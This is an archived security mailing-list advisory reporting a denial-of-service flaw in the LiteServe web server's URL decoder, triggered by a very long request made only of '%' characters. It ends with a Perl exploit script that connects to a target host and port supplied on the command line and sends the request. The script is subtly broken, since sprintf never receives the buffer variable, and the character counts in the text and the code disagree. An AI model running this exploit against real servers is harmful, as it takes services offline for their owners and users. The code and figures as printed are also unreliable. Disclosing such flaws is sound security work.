[<prev] [next>] [day] [month] [year] [list]
Message-ID: <000d01c28e80$a91e79a0$e62d1c41@kc.rr.com>
From: mattmurphy at kc.rr.com (Matthew Murphy)
Subject: LiteServe URL Decoding DoS
Christopher Fillion's Perception offers LiteServe, the server suite that has
recently been the subject of intensive security research. Another
vulnerability has been discovered in LiteServe. The vulnerability this time
lies in LiteServe's URL decoder, once again part of the HTTP service.
LiteServe's URL decoder has a problem handling illegal "%xx" sequences, such
as "%.@", for example, and may produce corrupted output when such a sequence
is used. The problem appears to be a referencing issue when the decode
sequence does not specify a legitamite hexadecimal sequence. A denial of
service may occur if LiteServe is passed an extremely large request
consisting only of "%" characters. 290,259 such characters will cause
LiteServe to freeze:
GET /[buffer] HTTP/1.0
After this request is processed, attempting to connect to the HTTP service
reveals that the server is dead.
Exploit:
#!/usr/bin/perl
use IO::Socket;
$buffer="%"x290759;
$req=sprintf("GET /%s HTTP/1.0\r\n\r\n");
$f=IO::Socket::INET->new(PeerAddr=>$ARGV[0],PeerPort=>$ARGV[1],Proto=>"tcp")
;
print $f $req;
undef $f;
Powered by blists - more mailing lists